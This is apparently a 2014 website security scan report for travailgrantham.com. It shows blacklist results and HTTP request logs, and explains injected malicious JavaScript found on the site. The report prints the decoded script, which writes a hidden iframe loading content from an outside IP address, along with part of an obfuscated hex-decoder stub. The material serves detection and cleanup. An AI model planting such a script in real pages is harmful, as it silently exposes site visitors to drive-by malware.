Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=travailgrantham.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://travailgrantham.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://travailgrantham.com/ | 200 OK Content-Length: 9343 Content-Type: text/html | malicious |
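Malicious code - confirmed by antiviruses (see below):
function c1200847515n490ff3b344107(n490ff3b3448ec){ var n490ff3b3450d0=16; return (parseInt(n490ff3b3448ec,n490ff3b3450d0));}function n490ff3b346099(n490ff3b34648c){ function n490ff3b347058(){return 2;} var n490ff3b346873='';n490ff3b347827=String.fromCharCode;for(n490ff3b346c66=0;n490ff3b346c66<n490ff3b34648c.length;n490ff3b346c66+=n490ff3b347058()){ n490ff3b346873+=(n490ff3b347827(c1200847515n490ff3b344107(n490ff3b34648c.substr(n490ff3b346c66,n490ff3b347058()))));}return n490ff3b346873;} var
(The obfuscated listing is cut off at this point in the report; the hex-encoded payload that followed is not shown.)
Decoded script:
function check_content(){var i=0;while(document.getElementsByTagName('iframe').length){var el=document.getElementsByTagName('iframe')[i];if( (el.style.display=='none' || el.style.visibility =='hidden' || (el.width<5 && el.height<5)) && el.name!='c1'){el.parentNode.removeChild(el);}else i++;}}check_content(); if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%31%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%37%39%2e%31%33%32%2e%32%31%31%2e%33%30%2f%68%65%69%2f%3f%74%3d%32%34%27%20%77%69%64%74%68%3d%35%32%30%20%68%65%69%67%68%74%3d%32%36%30%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}var myia=true;
What the listings show: the obfuscated stub is a hex decoder. It reads its argument two characters at a time, parses each pair as base 16 and turns it into a character with String.fromCharCode. The decoded script first removes every iframe that is hidden (display:none, visibility:hidden, or smaller than 5x5) unless it is named c1, presumably to strip other injected frames. Then, guarded by the myia flag so that it runs only once per page, it writes a percent-encoded string into the document. That string unescapes to an iframe named c1 with style 'display: none' whose source is hxxp://79.132.211[.]30/hei/?t=24 (defanged here). Visitors' browsers therefore load content from that address invisibly, which makes the address the network indicator to block and to search for in proxy or DNS logs.
Antivirus reports: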
| ||
http://travailgrantham.com/test404page.js | 404 Not Found Content-Length: 1363 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: travailgrantham.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Oct 2014 01:13:46 GMT
Accept-Ranges: bytes
ETag: "9986b0a8-247f-45ad3fc663a80"
Server: Apache
Content-Length: 9343
Content-Type: text/html
Last-Modified: Tue, 04 Nov 2008 02:40:26 GMT
...9343 bytes of data.
GET / HTTP/1.1
Host: travailgrantham.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Oct 2014 01:13:46 GMT
Accept-Ranges: bytes
ETag: "9986b0a8-247f-45ad3fc663a80"
Server: Apache
Content-Length: 9343
Content-Type: text/html
Last-Modified: Tue, 04 Nov 2008 02:40:26 GMT
...9343 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: travailgrantham.com
Referer: http://www.google.com/search?q=travailgrantham.com
Result:
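The result is similar to the first query. No suspicious redirects were found.
Note that this check only compares the response to a normal visit with the response to a visit carrying a search-engine Referer. It does not clear the page: the 9343-byte body returned here has the same length as the page flagged as malicious under "Scanned pages/files", so the hidden iframe is most likely served to every visitor regardless of Referer.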
GET / HTTP/1.1
Host: travailgrantham.com
Referer: http://www.google.com/search?q=travailgrantham.com
Result:
The result is similar to the first query. There are no suspicious redirects found.